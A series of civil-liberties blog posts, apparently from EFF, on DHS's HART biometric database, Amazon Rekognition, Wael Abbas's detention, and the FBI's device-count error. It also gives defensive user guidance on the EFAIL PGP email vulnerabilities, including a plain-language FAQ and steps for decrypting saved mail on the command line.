HART: Homeland Security’s Massive New Database Will Include Face Recognition, DNA, and Peoples’ “Non-Obvious Relationships”

So why do we know so little about it?

The U.S. Department of Homeland Security (DHS) is quietly building what will likely become the largest database of biometric and biographic data on citizens and foreigners in the United States. The agency’s new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics—from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments. And yet, we still know very little about it.

The records DHS plans to include in HART will chill and deter people from exercising their First Amendment protected rights to speak, assemble, and associate. Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings. Other data DHS is planning to collect—including information about people’s “relationship patterns” and from officer “encounters” with the public—can be used to identify political affiliations, religious activities, and familial and friendly relationships. These data points are also frequently colored by conjecture and bias.

In late May, EFF filed comments criticizing DHS’s plans to collect, store, and share biometric and biographic records it receives from external agencies and to exempt this information from the federal Privacy Act. These newly-designated “External Biometric Records” (EBRs) will be integral to DHS’s bigger plans to build out HART. As we told the agency in our comments, DHS must do more to minimize the threats to privacy and civil liberties posed by this vast new trove of highly sensitive personal data.

DHS Biometrics Systems—From IDENT to HART

DHS Growth of BiometricsDHS slide showing growth of its legacy IDENT biometric database

DHS currently collects a lot of data. Its legacy IDENT fingerprint database contains information on 220-million unique individuals and processes 350,000 fingerprint transactions every day. This is an exponential increase from 20 years ago when IDENT only contained information on 1.8-million people. Between IDENT and other DHS-managed databases, the agency manages over 10-billion biographic records and adds 10-15 million more each week.

DHS Data LandscapeDHS slide showing breadth of DHS biometric and biographic data

DHS’s new HART database will allow the agency to vastly expand the types of records it can collect and store. HART will support at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for “other modalities.” It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to by highly subjective, including information collected from officer “encounters” with the public and information about people’s “relationship patterns.”

DHS HART TimelineDHS slide showing expansion of its new HART biometric and biographic database

HART will Impinge on First Amendment Rights

DHS plans to include records in HART that will chill speech and deter people from associating with others.

DHS’s face recognition roll-out is especially concerning. The agency uses mobile biometric devices that can identify faces and capture face data in the field, allowing its ICE (immigration) and CBP (customs) officers to scan everyone with whom they come into contact, whether or not those people are suspected of any criminal activity or an immigration violation. DHS is also partnering with airlines and other third parties to collect face images from travelers entering and leaving the U.S. When combined with data from other government agencies, these troubling collection practices will allow DHS to build a database large enough to identify and track all people in public places, without their knowledge—not just in places the agency oversees, like airports, but anywhere there are cameras.

Police abuse of facial recognition technology is not a theoretical issue: it’s happening today. Law enforcement has already used face recognition on public streets and at political protests. During the protests surrounding the death of Freddie Gray in 2015, Baltimore Police ran social media photos against a face recognition database to identify protesters and arrest them. Recent Amazon promotional videos encourage police agencies to acquire that company’s face “Rekognition” capabilities and use them with body cameras and smart cameras to track people throughout cities. At least two U.S. cities are already using Rekognition.

DHS compounds face recognition’s threat to anonymity and free speech by planning to include “records related to the analysis of relationship patterns among individuals.” We don’t know where DHS or its external partners will be getting these “relationship pattern” records, but they could come from social media profiles and posts, which the government plans to track by collecting social media user names from all foreign travelers entering the country.

Social media records, even if they are publicly available, can include highly personal and private information, and the fear that the government may be collecting and searching through this information may cause people to self-censor what they say online. The data collected also won’t be limited to information about foreign travelers—travelers’ social media records may include information on family members and friends who are U.S. citizens or lawful permanent residents, two groups protected explicitly by the Privacy Act. As the recent, repeated Facebook scandals are showing us, even when you think you have done everything you can to protect your own data, it could easily be disclosed without your control through the actions of your friends and contacts or Facebook itself.

DHS’s “relationship pattern” records will likely be misleading or inaccurate. DHS acknowledges that these records will include “non-obvious relationships.” However, if the relationships are “non-obvious,” one has to question whether they truly exist. Instead, DHS could be seeing connections among people that are based on nothing more than “liking” the same news article, using the same foreign words, or following the same organization on social media. This is highly problematic because records like these frequently inform officer decisions to stop, search, and arrest people.

DHS plans to include additional records in HART that could be based on or impact First Amendment protected speech and activity. Records will include “miscellaneous officer comment information” and “encounter data.” These types of information come from police interactions with civilians, and are often collected under extremely questionable legal circumstances. For example, ICE officers use mobile devices to collect biometric and biographic data from people they “encounter” in the field, including via unauthorized entry into people’s homes and Bible study groups, and in public places where people congregate with other members of their community, such as on soccer fields, in community centers, and on buses. “Encounters” like these, whether they are conducted by ICE or by state or local police, are frequently not based on individualized suspicion that a civilian has done anything wrong, but that doesn’t prevent the officer from stockpiling any information obtained from the civilian during the encounter.

Finally, DHS relies on data from gang databases (its own and those from states), which often contain unsubstantiated data concerning people’s status and associations and are notoriously inaccurate. DHS has even fabricated gang status as an excuse to deport people.

HART Will Include Inaccurate Data and Will Share that Data with Other Agencies

DHS is not taking necessary steps with its new HART database to determine whether its own data and the data collected from its external partners are sufficiently accurate to prevent innocent people from being identified as criminal suspects, immigration law violators, or terrorists.

DHS has stated that it intends to rely on face recognition to identify data subjects across a variety of its mission areas, and “face matching” is one of the first components of the HART database to be built out. However, face recognition frequently is an inaccurate and unreliable biometric identifier. DHS’s tests of its own systems found significantly high levels of inaccuracy—the systems falsely rejected as many as 1 in 25 travelers. As a Georgetown report recently noted, “DHS’ error-prone face scanning system could cause 1,632 passengers to be wrongfully delayed or denied boarding every day at New York’s John F. Kennedy (JFK) International Airport alone.”

DHS’s external partners are also employing face recognition systems with high rates of inaccuracy. For example, FBI has admitted that its Next Generation Identification database “may not be sufficiently reliable to accurately locate other photos of the same identity, resulting in an increased percentage of misidentifications.” Potential foreign partners such as police departments in the United Kingdom use face recognition systems with false positive rates as high as a 98%—meaning that for every 100 people identified as suspects, 98 in fact were not suspects.

DHS Partner AgenciesDHS Slide Showing Partner Agencies

People of color and immigrants will shoulder much more of the burden of these misidentifications. For example, people of color are disproportionately represented in criminal and immigration databases, due to the unfair legacy of discrimination in our criminal justice and immigration systems. Moreover, FBI and MIT research has shown that current face recognition systems misidentify people of color and women at higher rates than whites and men, and the number of mistaken IDs increases for people with darker skin tones. False positives represent real people who may erroneously become suspects in a law enforcement or immigration investigation. This is true even if a face recognition system offers several results for a search instead of one; each of the people identified could be detained or brought in for questioning, even if there is nothing else linking them to a crime or violation.

In addition to accuracy problems inherent in face recognition, DHS’s own immigration data has also been shown to be unacceptably inaccurate. A 2005 Migration Policy Institute study analyzing records obtained through FOIA found “42% of NCIC immigration hits in response to police queries were ‘false positives’ where DHS was unable to confirm that the individual was an actual immigration violator.” A 2011 study of DHS’s Secure Communities program found approximately 3,600 United States citizens were improperly caught up in the program due to incorrect immigration records. As these inaccurate records are propagated throughout DHS’s partner agencies’ systems, it will become impossible to determine the source of the inaccuracy and correct the data.

HART Is Fatally Flawed and Must Be Stopped

DHS’s plans for future data collection and use should make us all very worried. For example, despite pushback from EFF, Georgetown, ACLU, and others, DHS believes it’s legally authorized to collect and retain face data from millions of U.S. citizens traveling internationally. However, as Georgetown’s Center on Privacy and Technology notes, Congress has never authorized face scans of American citizens.

Despite this, DHS plans to roll out its face recognition program to every international flight in the country within the next four years. DHS has stated “the only way for an individual to ensure he or she is not subject to collection of biometric information when traveling internationally is to refrain from traveling.”

This is just the tip of the iceberg. CBP Commissioner Kevin McAleenan has stated CBP wants to be able to use biometrics to “confirm the identity of travelers at any point in their travel,” not just at entry to or exit from the United States. This includes creating a “biometric pathway” to track all travelers through airports, from check-in, through security, into airport lounges and shops, and onto flights. Given CBP’s recent partnerships with airlines and plans to collect social media credentials, this could also mean CBP plans to track travelers from the moment they begin their internet travel research. Several Congress members have introduced legislation to legitimize some of these plans.

Congress has expressed concerns with DHS’s biometric programs. Senators Edward Markey and Mike Lee, in a recent letter addressed to the agency, stated, “[w]e are concerned that the use of the program on U.S. citizens remains facially unauthorized[.] . . . We request that DHS stop the expansion of this program and provide Congress with its explicit statutory authority to use and expand a biometric exit program on U.S. citizens.” The senators have urged DHS to propose a rulemaking to clarify its plans for biometric exit. Congress also withheld funds last year from DHS’s Office of Biometric Identity Management.

DHS’s Inspector General criticized the agency last year for failure to properly train its personnel on how biometric systems worked and noted that the agency’s reliance on third parties to verify travelers leaving the country “occasionally provided false departure or arrival status on visitors.” The OIG is again investigating the biometric exit program this year and plans to “assess whether biometric data collected at pilot locations has improved DHS's ability to verify departures.” The Government Accountability Office has also looked into the agency’s programs, criticizing the reliability of DHS’s data and the agency’s failure to evaluate whether a program that collects biometrics from all travelers leaving the country was even feasible.

However, these actions are not enough. DHS needs to end its plans to use its HART database to collect even more biometric and biographic information about U.S. citizens and foreigners. This system poses a very real threat to First Amendment-protected activities. Further, DHS has a well-documented history of poor data management, and face recognition has a high rate of misidentifications. Congress must step in with more oversight and act now to put the brakes on DHS’s broad expansion of data collection.

Related Cases: FBI's Next Generation Identification Biometrics Database

How To Turn PGP Back On As Safely As Possible

Previously, EFF recommended to PGP users that, because of new attacks revealed by researchers from Münster University of Applied Sciences, Ruhr University Bochum, and NXP Semiconductors, they should disable the PGP plugins in their email clients for now. You can read more detailed rationale for this advice in our FAQ on the topic, but undoubtedly the most frequently asked question has been: how long is for now? When will it be safe to use PGP for email again?

The TL;DR (although you really should read the rest of this article): coders and researchers across the PGP email ecosystem have been hard at work addressing the problems highlighted by the paper—and after their sterling efforts, we believe some parts are now safe for use, with sufficient precautions.

If you use PGP for email using Thunderbird 52.8 and Enigmail 2.0.6, you can update to the latest versions of Enigmail, turn on “View as Plain Text” (see below), re-enable Enigmail, and get back to using PGP in email.

For other popular clients: the answer is hazier. If you use GPGTools and Apple Mail, you should still wait. That system is still vulnerable, as this video from First Look’s Micah Lee shows.


Privacy info. This embed will serve content from


Other email clients have specific weaknesses reported in the EFAIL paper which may or may not have since been patched. Even if they were patched, depending on how the patch was implemented, they may or may not still be vulnerable to other exploits in the class of vulnerabilities described in the paper. So be careful out there: keep your software regularly updated, and choose conservative privacy settings for the client you use to decrypt and encrypt PGP mail. In particular, we continue to not recommend using PGP with email clients that display HTML mail. If possible, turn off that feature—and if you can’t, consider decrypting and encrypting messages using an external, dedicated application.

And remember, the safety of your messages also depends on the security of your correspondents, so encourage them to use clients that are safe from EFAIL too. You should even think about asking them to confirm which versions they’re using to ensure it’s safe to correspond.

The Fixes in Detail

The researchers’ publication contains a proof-of-concept exploit that affected users who protect their communications with PGP. The exploit allowed an attacker to use the victim’s own email client to decrypt previously acquired messages (or other protected information) and return the decrypted content to the attacker without alerting the victim. The attacker needed access to the previous (still encrypted) text. Unfortunately, an attacker that has access to your old encrypted emails is exactly the serious threat that the most targeted populations use PGP to protect against.

The attack, once understood, is simple to deploy. However, despite the fact that the vulnerability had been disclosed to the relevant developers months ago, many of the most popular ways of using PGP and email had no protection against the attack at the time of the paper’s publication. Because so many people in extremely vulnerable roles—such as journalists, human rights defenders, and dissidents—expect PGP to protect them against this kind of attack, we warned PGP users to hold off using it for secure communications and disable PGP plugins in their email clients until these problems were fixed.

That advice prompted a lot of discussion: some approving, some less so. We’re talking to everybody we can in the PGP community to hear about their experiences, and we hope to publish the deeper lessons we, and others, have learned from EFAIL and how it was handled.

But for now, we’ve been concentrating on testing whether the exploit has been successfully patched in the software setups most used by vulnerable groups.

Turning Off HTML vs Disabling Remote Content Loading

Many experts, after reading the research paper, were surprised we recommended disabling PGP in email, when it seemed like some less drastic options (such as turning off remote resource loading, and/or turning off their email client’s ability to read and decrypt HTML mail) would have sufficed to fend off the most obvious EFAIL attack.

But upon closer reading of the text of the paper, it becomes clear that the researchers describe exactly how to circumvent mail clients' attempts to block the remote loading of resources. Other researchers have created, and continue to create, exploits that can defeat this supposed protection. Further, with remote content turned off, a button is usually present to load remote content by choice. An alternative label for that innocuous-seeming button would be, “Leak all of my past encrypted emails to an attacker.” Having that button available to users is giving them an opportunity to shoot themselves in the foot.

Then there’s the other option for protection: turning off HTML in mail clients. At the time, the researchers were not confident that this protection was sufficient: they had already discovered a way of defeating S/MIME, a comparable email encryption standard, with HTML mail turned off. And while their simplest example used HTML to steal data, they also spelled out hypothetical attacks that might not need it.

Turning off HTML mail appears to be holding up as a defense. Unfortunately, not every client has this as an option: you can consistently turn off HTML in Thunderbird, but not in Apple Mail.

So, our first recommendation: whatever client you use, turn off HTML email. We have instructions for this in Thunderbird below.

Thunderbird+Enigmail Users Can Turn PGP Back On

Thunderbird and Enigmail’s developers have been working on ways to protect against the EFAIL vulnerabilities. As of version 2.0.6 (released Sunday May 27), Enigmail has released patches that defend against all known exploits described in the EFAIL paper, along with some new ones in the same class that other researchers were able to devise, which beat earlier Enigmail fixes. Each new fix made it a little harder for an attackerto get through Enigmail’s defenses. We feel confident that, if you update to this version of Enigmail (and keep updating!), Thunderbird users can turn their PGP back on.

But, while Enigmail now defends against most known attacks even with HTML on, the EFAIL vulnerability demonstrated just how dangerous HTML in email is for security. Thus, we recommend that Enigmail users also turn off HTML by going to View > Message Body As > Plain Text.

1. First click on the Thunderbird hamburger menu (the three horizontal lines).

Screenshot showing the Thunderbird hamburger menu selected

2. Select “View” from the right side of the menu that appears.

Screenshot showing the "View" option selected

3. Select “Message Body As” from the menu that appears, then select the “Plain Text” radio option.

Screenshot showing the "Message Body As" then "Plain Text" options selected

Viewing all email in plaintext can be hard, and not just because many services send only HTML emails. Turning off HTML mail can pose some usability problems, such as some attachments failing to show up. Thunderbird users shouldn't have to make this trade-off between usability and security, so we hope that Thunderbird will take a closer look at supporting their plaintext community from now on. As the software is now, however, users will need to decide for themselves whether to take the risk of using HTML mail; the most vulnerable users should probably not take that risk, but the right choice for your community is a judgment call based on your situation.

Apple Mail+GPGTools Users Should Keep PGP Disabled For Now

Since Apple Mail doesn’t provide a supported plugin interface, the GPGTools developers have faced a difficult challenge in updating GPGTools to defend against EFAIL. Additionally, Apple Mail has no option for users to view all emails without HTML (also called plaintext-only). Apple Mail only provides an option to disable remote content loading, which does not defend against existing attacks.

Despite the challenges with Apple Mail, the GPGTools developers are working hard on fixes for all reported EFAIL-related attacks, and a release is expected very soon. That said, we do not recommend re-enabling GPGMail with Apple Mail yet.

Other Clients

The EFAIL researchers did a great job reviewing and finding problems with a wide set of desktop email clients. Using one of the lesser-known clients may or may not leave you vulnerable to the specific vulnerabilities outlined in the paper. And depending on the way the patches work, the patches may or may not protect against problems discovered by future research into the same class of problems.

Our advice for all PGP email users remains the same: if you depend on your email client to decipher PGP messages, make sure it doesn’t decode HTML mail, and check with its creators to see whether they’ve been working on protecting against EFAIL.

The Future of Pretty Good Privacy

Unlike situations where a fix only requires one piece of software to be mended and upgraded, some of the EFAIL problems come from interaction between all the different pieces of using PGP with email: email clients like Thunderbird, PGP plugins like Enigmail, and PGP implementations like GnuPG.

There are lots of moving parts to be fixed, and some of the fixes involve changes to the very core of how they function. It’s not surprising that it takes time to coordinate against attacks that exploit the complex interconnections between all of these parts.

EFF has fought, in the courts and in the corridors of power, for the right to write, export, and use decentralized and open source encryption tools, for as long as PGP has existed. We’re under no illusion about how hard this work is, or how underappreciated and underfunded it can be, or how vital its results are, especially for those targeted by the most powerful and determined of attackers. The transparent and public cooperation of all the parts of the PGP system make for some hard conversations sometimes, but that’s what keeps it honest and accountable—and that’s what keeps us all safe.

But if we’re to continue to use and recommend PGP for the cases where it is most appropriate—protecting the most vulnerable and targeted of Internet users—we need to carry on that conversation. We need to cooperate to radically improve the secure email experience, to learn from what we know about modern cryptography and usability, and to decide what true 21st-century secure email must look like.

It’s time to upgrade not just your PGP email client, but also the entire secure email ecosystem, so that it’s usable, universal, and stable.

Amazon, Stop Powering Government Surveillance

EFF has joined the ACLU and a coalition of civil liberties organizations demanding that Amazon stop powering a government surveillance infrastructure. Last week, we signed onto a letter to Amazon condemning the company for developing a new face recognition product that enables real-time government surveillance through police body cameras and the smart cameras blanketing many cities. Amazon has been heavily marketing this tool—called “Rekognition”—to law enforcement, and it’s already being used by agencies in Florida and Oregon. This system affords the government vast and dangerous surveillance powers, and it poses a threat to the privacy and freedom of communities across the country. That includes many of Amazon’s own customers, who represent more than 75 percent of U.S. online consumers.

As the joint letter to Amazon CEO Jeff Bezos explains, Amazon’s face recognition technology is “readily available to violate rights and target communities of color.” And as we’ve discussed extensively before, face recognition technology like this allows the government to amp up surveillance in already over-policed communities of color, continuously track immigrants, and identify and arrest protesters and activists. This technology will not only invade our privacy and unfairly burden minority and immigrant communities, but it will also chill our free speech.

Amazon should stand up for civil liberties, including those of its own customers, and get out of the surveillance business.

Since the ACLU sounded the alarm, others have started to push back on Amazon. The Congressional Black Caucus wrote a separate letter to Bezos last week, stating, “We are troubled by the profound negative unintended consequences this form of artificial intelligence could have for African Americans, undocumented immigrants, and protesters.” The CBC pointed out the “race-based ‘blind spots’ in artificial intelligence” that result in higher numbers of misidentifications for African Americans and women than for whites and men, and called on Amazon to hire more lawyers, engineers, and data scientists of color. Two other members of Congress followed up with another letter on Friday.

Amazon’s partnership with law enforcement isn’t new. Amazon already works with agencies across the country, offering cloud storage services through Amazon Web Services (AWS) that allow agencies to store the extremely large video files generated by body and other surveillance cameras. Rekognition is an inexpensive add-on to AWS, costing agencies approximately $6-$12 per month.

Rekognition doesn’t just identify faces. It also can track people through a scene, even if their faces aren’t visible. It can identify and catalog a person’s gender, what they’re doing, what they’re wearing, and whether they’re happy or sad. It can identify other things in a scene, like dogs, cars, or trees, and can recognize text, including street signs and license plates. It also offers to flag things it considers “unsafe” or “inappropriate.”

And the technology is powerful, if Amazon’s marketing materials are accurate. According to the company, Rekognition can identify people in real-time by instantaneously searching databases containing tens of millions of faces, detect up to 100 people in “challenging crowded” images, and track people through video—within a single shot and across multiple shots, and even when the camera is in motion—which makes “investigation and monitoring of individuals easy and accurate” for “security and surveillance applications.” Amazon has even advertised Rekognition for use on police officer “bodycams.” (The company took mention of bodycams off its website after the ACLU voiced concern, but “[t]hat appears to be the extent of its response[.]”)

This is an example of what can go wrong when police departments unilaterally decide what privacy invasions are in the public interest, without any public oversight or input. That’s why EFF supports Community Control Over Police Surveillance (CCOPS) measures, which ensure that local police can't do deals with surveillance technology companies without going through local city councils and the public. People deserve a say in what types of surveillance technology police use in their communities, and what policies and safeguards the police follow. Further, governments must make more balanced, accountable decisions about surveillance when communities and elected officials are involved in the decision-making process.

Amazon responded to the uproar surrounding the announcement of its government surveillance work by defending the usefulness of the program, noting that it has been used to find lost children in amusement parks and to identify faces in the crowd at the royal wedding. But it failed to grapple with the bigger issue: as one journalist put it, “Nobody is forcing these companies to supply more sensitive image-recognition technology to those who might use it in violation of human or civil rights.”

Amazon should stand up for civil liberties, including those of its own customers, and get out of the surveillance business. It should cut law enforcement off from using its face recognition technology, not help usher in a surveillance state. And communities across the country should demand baseline measures to stop law enforcement from acquiring and using powerful new surveillance systems without any public oversight or accountability in the future.


Egyptian Blogger and Activist Wael Abbas Detained

When we wrote of award-winning journalist Wael Abbas being silenced by social media platforms in February, we never suspected that those suspensions would reach beyond the internet to help silence him in real life. But, following Abbas's detention on Wednesday by police in Cairo, we now fear that decisions—and lack of transparency—made by Silicon Valley companies will help Egyptian authorities in their crackdown on journalists and human rights activists.

Abbas was taken at dawn on May 23 by police to an undisclosed location, according to news reports which quote his lawyer, Gamal Eid. The Arabic Network for Human Rights Information (ANHRI) reported that Abbas was not shown a warrant or given a reason for his arrest. He appeared in front of state security yesterday and was questioned and ordered by prosecutors to be held for fifteen days. According to the Association for Freedom of Thought and Expression (AFTE), Abbas was charged with “involvement in a terrorist group”, “spreading false news” and “misuse of social networks.”

As we detailed previously, Abbas is known for his work exposing police brutality and other abuses by Egyptian authorities, and as such, he's faced backlash from the state before. He was convicted in 2010 on charges of "providing telecommunications service to the public without permission from authorities" after publishing a series of blog posts in which he accused the Egyptian government of human rights abuses.

Twitter does not comment publicly on individual accounts, but in December, Abbas claimed in a Facebook post that Twitter had not provided him with a reason for his suspension. Now, at least one local media outlet is reporting that Abbas's Twitter account—which was suspended in December 2017—was taken down due to incitement to violence.

It seems clear that the messaging around Abbas' detention is that his arrest was connected to his posts on Facebook and Twitter, and that the prosecution and media are using his suspension by these services as part of the evidence for his guilt.

In the medium term, this is yet another reason why we need more transparency and clarity in social media takedowns. Without transparency, these acts of private censorship are already effectively a hidden court, with little due process. These decisions are being used as evidence by media campaigns against activists, by real-world courts (some, like the "media committees" that judged Abbas, with little due process of their own) — and with real consequences.

In the short term, however, the far more importanct step is for the Egyptian state to immediately release Wael Abbas, an independent journalist, from these ridiculous charges, and restore his freedom and the freedom of the online Egyptian press. We call on Egypt to Free Wael Abbas.


FBI Admits It Inflated Number of Supposedly Unhackable Devices

We’ve learned that the FBI has been misinforming Congress and the public as part of its call for backdoor access to encrypted devices. For months, the Bureau has claimed that encryption prevented it from legally searching the contents of nearly 7,800 devices in 2017, but today the Washington Post reports that the actual number is far lower due to "programming errors" by the FBI.

Frankly, we’re not surprised. FBI Director Christopher Wray and others argue that law enforcement needs some sort of backdoor “exceptional access” in order to deal with the increased adoption of encryption, particularly on mobile devices. And the 7,775 supposedly unhackable phones encountered by the FBI in 2017 have been central to Wray’s claim that their investigations are “Going Dark.” But the scope of this problem is called into doubt by services offered by third-party vendors like Cellebrite and Grayshift, which can reportedly bypass encryption on even the newest phones. The Bureau’s credibility on this issue was also undercut by a recent DOJ Office of the Inspector General report, which found that internal failures of communication caused the government to make false statements about its need for Apple to assist in unlocking a seized iPhone as part of the San Bernardino case.

Given the availability of these third-party solutions, we’ve questioned how and why the FBI finds itself thwarted by so many locked phones. That’s why last week, EFF submitted a FOIA request for records related to Wray’s talking points about the 7,800 unhackable phones and the FBI’s use of outside vendors to bypass encryption.

The stakes here are high. Imposing an exceptional access mandate on encryption providers would be extraordinarily dangerous from a security perspective, but the government has never provided details about the scope of the supposed Going Dark problem. The latest revision to Director Wray’s favorite talking point demonstrates that the case for legislation is even weaker than we thought. We hope that the government is suitably forthcoming to our FOIA request so that we can get to the bottom of this issue.

Related Cases: Apple Challenges FBI: All Writs Act Order (CA)

Pretty Good Procedures for Protecting Your Email

A group of researchers recently released a paper that describes a new class of serious vulnerabilities in the popular encryption standard PGP (including GPG) as implemented in email clients. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email. See EFF’s analysis and FAQ for more detail.

Our current recommendation is to disable PGP integration in email clients. This is the number one thing you can do to protect your past messages, and prevent future messages that you receive from being read by an attacker. You should also encourage your contacts to do the same.

If you have old emails you need to access, the next thing you can do is save old emails to be decrypted on the command line.

Methods for reading encrypted email on the command line vary between operating systems, so separate instructions are needed. The instructions linked above for disabling the plugin from your mail client leave your PGP keyring in place, so you will use the same passphrase when prompted.

Using the Command Line to Decrypt a Message on Linux

If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL.

Note that the first three steps (opening the terminal) will vary between desktop environments.

  1. Open the Activities view by clicking all the way in the top left corner of your screen.

2. Type “terminal” into the search bar, and press Enter. This will open the command prompt.

3. Type “cd Desktop” to go to your desktop. Mind the capital ‘D’!

4. Type “gpg -d encrypted.eml” using the name of the file you saved earlier. This may prompt you for your PGP passphrase depending on your configuration and recent usage, and will output the full email in the terminal window.

These notes are based on Ubuntu Desktop with GNOME 3.


PGP and EFAIL: Frequently Asked Questions

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email, and theorized many more which others could build upon. For users who have few—or even no—alternatives for end-to-end encryption, news of these vulnerabilities may leave many questions unanswered.

Digital security trainers, whistleblowers, journalists, activists, cryptographers, industry, and nonprofit organizations have relied on PGP for 27 years as a way to protect email communications from eavesdroppers and ensure the authenticity of messages. If you’re like us, you likely have recommended PGP as an end-to-end encrypted email solution in workshops, trainings, guides, cryptoparties, and keysigning parties. It can be hard to imagine a workflow without PGP once you’ve taken the time to learn it and incorporate it in your communications.

We’ve attempted to answer some important questions about the current state of PGP email security below.

Who is affected, and why should I care?

Since PGP is used as a communication tool, sending messages to others with unpatched clients puts your messages at risk, too. Sending PGP messages to others also increases the risk that they will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them. Balancing the risks of continuing to use PGP can be tricky, and will depend heavily on your own situation and that of your contacts.

Is disabling HTML sufficient?

Turning off sending HTML email will not prevent this attack. For some published attacks, turning off viewing HTML email may protect your messages being leaked to an attacker by you. However, since PGP email is encrypted to both the sender and each recipient, it will not protect these messages from being leaked by anyone else you’ve communicated with. Additionally, turning off HTML email may not protect these messages against future attacks that are discovered which build off of the current vulnerabilities.

Turning off reading HTML email while still sending PGP-encrypted messages encourages others to read these with their own potentially vulnerable clients. This promotes an ecosystem that puts the contents of these messages (as well as any past messages that are decrypted by them) at risk.

I use software that is verified with a PGP signature. Can it be trusted?

Yes! Verifying software signed with PGP is not vulnerable to this class of attack. Package management systems enforcing signature verification (like some distributions of Linux do) are also unaffected.

What are the vulnerabilities?

There are two attacks of concern demonstrated by the researchers:

1. “Direct exfiltration” attack:

This takes advantage of the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls.

2. Ciphertext modification attack:

The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously obtained encrypted email. This second vulnerability takes advantage of the combination of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check does not check out. Since the OpenPGP standard did not specify what to do if the integrity check does not check out, some software incorrectly displays the message anyway, enabling this attack. Furthermore, this style of attack, if paired with an exfiltration channel appropriate to the context, may not be limited to the context of HTML-formatted email.

We have more detail about the specifics of the vulnerabilities and details on mitigations.

What does the paper say about my email client?

Some email clients are impacted more than others, and the teams behind those clients are actively working on mitigating the risks presented. The paper describes both direct exfiltration (table 4, page 11) and backchannels (table 5, page 20) for major email clients. Even if your client has patched current vulnerabilities, new attacks may follow.

But I use [insert email software here] and it’s not on the affected list. Should I care?

While you may not be directly affected, the other participants in your encrypted conversations may be. For this attack, it isn’t important whether the sender or any receiver of the original secret message is targeted. This is because a PGP message is encrypted to each of their keys.
Sending PGP messages to others also increases the risk that your recipients will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them.

Does this mean PGP is broken?

The weaknesses in the underlying OpenPGP standard (specifically, OpenPGP’s lack of mandatory integrity verification) enable one of the attacks given in the paper. Despite its pre-existing weaknesses, OpenPGP can still be used reliably within certain constraints. When using PGP to encrypt or decrypt files at rest, or to verify software with strict signature checking, PGP still behaves according to expectation.

OpenPGP also uses underlying cryptographic primitives such as SHA-1 which are no longer considered safe and lacks the benefits of Authenticated Encryption (AE), and signatures can be trivially stripped from messages. In time, newer standards will have to be developed which address these more fundamental problems in the specification. Unfortunately, introducing fixes to introduce authenticated encryption without also rotating keys to strictly enforce usage constraints will make OpenPGP susceptible to backwards-compatibility attacks. This will have to be addressed in any future standard.

In short, OpenPGP can be trusted to a certain degree. For long-term security of sensitive communications, we suggest you migrate to another end-to-end encrypted platform.

What should I do about PGP software on my computer?

In general, keeping PGP (or GPG) on your system should be safe from the known exploits, provided that it is disconnected from email as described above. Some Linux systems depend on GPG for software verification, and PGP is still useful for manually verifying software. Uninstalling your PGP software may make your keys inaccessible and prevent you from decrypting past messages in some instances, as well.

Can my previous emails be read by an attacker?

If the PGP-encrypted contents of previous emails are sent to you in new emails using this attack and you open that email in an unpatched email client with PGP software enabled, then yes. For viewing your archive of encrypted emails, we recommend using the command line.

What if I keep getting PGP emails?

You can decrypt these emails via the command line. If you prefer not to, notify your contacts that PGP is, for the time being, no longer safe to use in email clients and decide whether the conversation can continue over another end-to-end encrypted platform, such as Signal.

Going forward, what should I look out for?

We will be following this issue closely in the coming weeks. Authors of email clients and PGP plugins are working actively to patch this vulnerability, so you should expect updates forthcoming. For the latest updates, you can follow or

Is there a replacement for sending end-to-end encrypted messages?

There is no secure, vetted replacement for PGP in email.

There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives.

I don’t have other end-to-end encrypted messaging options available. PGP is my only option. Can I still use it?

Unfortunately, we cannot recommend using PGP in email clients until they have been patched, both on your device and your recipient’s device. The timeline for these patches varies from client to client. We recommend disconnecting PGP from your email client until the appropriate mitigations have been released. Stay tuned to or for more info.

I don’t want to use the command line. Surely there’s a usable alternative. Can’t you recommend something else?

It’s very difficult to assess new software configurations in such a short timeframe. Some email clients are more vulnerable to this attack than others. However, using these email clients can have the effect of putting others at risk. We suggest decrypting archived emails with the command line, and moving to another end-to-end platform for conversations, at least until we are confident that the PGP email ecosystem has been restored to its previous level of security.

I only use PGP in the command line. Am I affected?

Yes and no. As we currently understand, if you are using PGP solely for file encryption, without email, there are no known exfiltration channels to send the file contents to an attacker. However, the contents may still have been modified in transit in a way that you won’t necessarily be able to see, depending on how the implementer of the specific PGP software chose to do things. This is due to the integrity downgrade aspect of the vulnerability.

Additionally, if you are using PGP to encrypt a message sent over email and your recipient uses a vulnerable email client, your correspondences are at risk of decryption. As it’s likely that many people use an email client to access PGP-encrypted emails, it’s important to clarify with your recipients that they have also disabled PGP in their email clients, or are using an unaffected client.

If you must continue sensitive correspondences, we highly recommend switching to a vetted end-to-end encryption tool.

Using the Command Line to Decrypt a Message on Windows

If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL.

